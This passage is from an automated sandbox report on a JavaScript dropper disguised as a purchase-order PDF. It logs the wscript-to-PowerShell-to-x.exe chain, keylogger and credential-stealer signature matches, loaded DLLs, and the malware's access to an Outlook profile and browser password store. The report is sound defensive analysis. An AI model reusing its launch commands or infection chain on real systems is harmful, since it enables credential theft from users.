                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECC738
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00EC29E0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00EC69A0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECE988
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECCA08
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECCCD8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00EC3E09
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00EC6FC8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECCFAA
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECF960
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_00ECE97A
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06842A90
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06849668
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06841FA8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06841850
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06849D38
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06845148
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684DAC3
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684DAC8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684D218
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684D660
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684D670
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06841F9C
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684E7CB
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684E7D0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684DF13
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684DF20
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06840B20
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06840B30
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684E36B
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684E378
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684F080
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06848CC0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684F4C8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684F4D8
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06840007
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684EC18
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684EC28
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06840040
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_06841841
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684CDAF
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684CDC0
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684F921
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684F930
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 11_2_0684513F
                  Source: PO-2513203-PDF.js | Initial sample: Strings found which are bigger than 50
                  Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.44695b0.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.x.exe.2c89c50.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.2c85409.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.2c85409.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.2c89c50.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 11.2.x.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0000000A.00000002.1437008178.0000000004409000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000B.00000002.2532782484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000A.00000002.1437008178.0000000004469000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7912, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: x.exe PID: 8060, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: x.exe PID: 2424, type: MEMORYSTR | Matched rule: MALWARE_Win_Phoenix author = ditekSHen, description = Phoenix/404KeyLogger keylogger payload, clamav_sig = MALWARE.Win.Trojan.Phoenix-Keylogger
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, B.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, B.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, --.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 10.2.x.exe.44695b0.3.raw.unpack, --.cs | Base64 encoded string: 'QMP5+Zav3OUq9OOcYs5CdQwVhfNast3/xEa0tVdiWYy4PoureKQ0hNBDRbWFjees'
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winJS@8/8@3/4
                  Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\believe[1].ps1
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7920:120:WilError_03
                  Source: C:\Windows\System32\wscript.exe | File created: C:\Temp\WTRTRWFSHS.ps1
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: x.exe, 0000000B.00000002.2538337454.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, x.exe, 0000000B.00000002.2538337454.0000000002E51000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: PO-2513203-PDF.js | Virustotal: Detection: 17%
                  Source: PO-2513203-PDF.js | ReversingLabs: Detection: 18%
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-2513203-PDF.js"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rasman.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
